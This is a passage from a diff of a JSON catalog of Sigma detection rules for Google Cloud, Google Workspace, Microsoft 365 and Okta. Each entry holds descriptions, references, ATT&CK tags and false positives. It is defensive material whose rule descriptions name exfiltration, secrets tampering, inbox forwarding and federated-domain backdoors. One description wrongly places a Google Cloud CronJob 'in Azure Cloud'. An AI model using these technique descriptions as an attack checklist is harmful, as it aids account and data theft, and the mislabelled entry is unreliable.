a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", - "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", - "value": "Google Cloud Kubernetes CronJob", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://kubernetes.io/docs/concepts/workloads/controllers/job/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.execution" - ], - "creation_date": "2021/11/22", - "filename": "gcp_kubernetes_cronjob.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", - "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", - "value": "Google Cloud Kubernetes RoleBinding", - "meta": { - "refs": [ - "https://github.com/elastic/detection-rules/pull/1267", - "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", - "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", - "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" - ], - "tags": [ - "attack.credential_access" - ], - "creation_date": "2021/08/09", - "filename": "gcp_kubernetes_rolebinding.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when the Secrets are Modified or Deleted.", - "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", - "value": "Google Cloud Kubernetes Secrets Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" - ], - "tags": [ - "attack.credential_access" - ], - "creation_date": "2021/08/09", - "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a service account is disabled or deleted in Google Cloud.", - "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", - "value": "Google Cloud Service Account Disabled or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ], - "creation_date": "2021/08/14", - "filename": "gcp_service_account_disabled_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a service account is modified in Google Cloud.", - "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", - "value": "Google Cloud Service Account Modified", - "meta": { - "refs": [ - "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/14", - "filename": "gcp_service_account_modified.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detect when a Cloud SQL DB has been modified or deleted.", - "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", - "value": "Google Cloud SQL Database Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/10/15", - "filename": "gcp_sql_database_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "SQL Database being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", - "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", - "value": "Google Cloud VPN Tunnel Modified or Deleted", - "meta": { - "refs": [ - "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/16", - "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "VPN Tunnel being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "gcp" - } - }, - { - "description": "Detects when an an application is removed from Google Workspace.", - "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", - "value": "Google Workspace Application Removed", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/26", - "filename": "gworkspace_application_removed.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Application being removed may be performed by a System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when an API access service account is granted domain authority.", - "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", - "value": "Google Workspace Granted Domain API Access", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2021/08/23", - "filename": "gworkspace_granted_domain_api_access.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when multi-factor authentication (MFA) is disabled.", - "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", - "value": "Google Workspace MFA Disabled", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/26", - "filename": "gworkspace_mfa_disabled.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "MFA may be disabled and performed by a system administrator." - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when an a role is modified or deleted in Google Workspace.", - "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", - "value": "Google Workspace Role Modified or Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/24", - "filename": "gworkspace_role_modified_or_deleted.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when an a role privilege is deleted in Google Workspace.", - "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", - "value": "Google Workspace Role Privilege Deleted", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/24", - "filename": "gworkspace_role_privilege_deleted.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when an Google Workspace user is granted admin privileges.", - "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", - "value": "Google Workspace User Granted Admin Privileges", - "meta": { - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2021/08/23", - "filename": "gworkspace_user_granted_admin_privileges.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Google Workspace admin role privileges, may be modified by system administrators." - ], - "logsource.category": "No established category", - "logsource.product": "google_workspace" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", - "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", - "value": "Activity Performed by Terminated User", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_activity_by_terminated_user.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", - "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", - "value": "Activity from Anonymous IP Addresses", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "User using a VPN or Proxy" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", - "uuid": "0f2468a2-5055-4212-a368-7321198ee706", - "value": "Activity from Infrequent Country", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_activity_from_infrequent_country.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", - "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", - "value": "Data Exfiltration to Unsanctioned Apps", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", - "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", - "value": "Activity from Suspicious IP Addresses", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_from_susp_ip_addresses.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", - "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", - "value": "Microsoft 365 - Impossible Travel Activity", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2020/07/06", - "filename": "microsoft365_impossible_travel_activity.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", - "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", - "value": "Logon from a Risky IP Address", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_logon_from_risky_ip_address.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Alert for the addition of a new federated domain.", - "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", - "value": "New Federated Domain Added", - "meta": { - "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", - "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", - "https://www.sygnia.co/golden-saml-advisory", - "https://o365blog.com/post/aadbackdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.003" - ], - "creation_date": "2022/02/08", - "filename": "microsoft365_new_federated_domain_added.yml", - "author": "@ionsor", - "level": "medium", - "falsepositive": [ - "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", - "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", - "value": "Microsoft 365 - Potential Ransomware Activity", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2021/08/19", - "filename": "microsoft365_potential_ransomware_activity.yml", - "author": "austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", - "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", - "value": "PST Export Alert Using eDiscovery Alert", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114" - ], - "creation_date": "2022/02/08", - "filename": "microsoft365_pst_export_alert.yml", - "author": "Sorina Ionescu", - "level": "medium", - "falsepositive": [ - "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", - "uuid": "6897cd82-6664-11ed-9022-0242ac120002", - "value": "PST Export Alert Using New-ComplianceSearchAction", - "meta": { - "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114" - ], - "creation_date": "2022/11/17", - "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", - "author": "Nikita Khalimonenkov", - "level": "medium", - "falsepositive": [ - "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", - "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", - "value": "Suspicious Inbox Forwarding", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ], - "creation_date": "2021/08/22", - "filename": "microsoft365_susp_inbox_forwarding.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", - "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", - "value": "Suspicious OAuth App File Download Activities", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" - ], - "tags": [ - "attack.exfiltration" - ], - "creation_date": "2021/08/23", - "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", - "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", - "value": "Microsoft 365 - Unusual Volume of File Deletion", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ], - "creation_date": "2021/08/19", - "filename": "microsoft365_unusual_volume_of_file_deletion.yml", - "author": "austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", - "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", - "value": "Microsoft 365 - User Restricted from Sending Email", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1199" - ], - "creation_date": "2021/08/19", - "filename": "microsoft365_user_restricted_from_sending_email.yml", - "author": "austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "m365" - } - }, - { - "description": "Detects when an the Administrator role is assigned to an user or group.", - "uuid": "413d4a81-6c98-4479-9863-014785fd579c", - "value": "Okta Admin Role Assigned to an User or Group", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_admin_role_assigned_to_user_or_group.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Administrator roles could be assigned to users or group by other admin users." - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when a API token is created", - "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", - "value": "Okta API Token Created", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2021/09/12", - "filename": "okta_api_token_created.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when a API Token is revoked.", - "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", - "value": "Okta API Token Revoked", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_api_token_revoked.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an application is modified or deleted.", - "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", - "value": "Okta Application Modified or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_application_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an application Sign-on Policy is modified or deleted.", - "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", - "value": "Okta Application Sign-On Policy Modified or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an attempt at deactivating or resetting MFA.", - "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", - "value": "Okta MFA Reset or Deactivated", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2021/09/21", - "filename": "okta_mfa_reset_or_deactivated.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "If a MFA reset or deactivated was performed by a system administrator." - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an Network Zone is Deactivated or Deleted.", - "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", - "value": "Okta Network Zone Deactivated or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_network_zone_deactivated_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "okta" - } - }, - { - "description": "Detects when an Okta policy is modified or deleted.", - "uuid": "1667a172-ed4c-463c-9969-efd92195319a", - "value": "Okta Policy Modified or Deleted", - "meta": { - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/12", - "filename": "okta_policy_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Okta Policies being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior 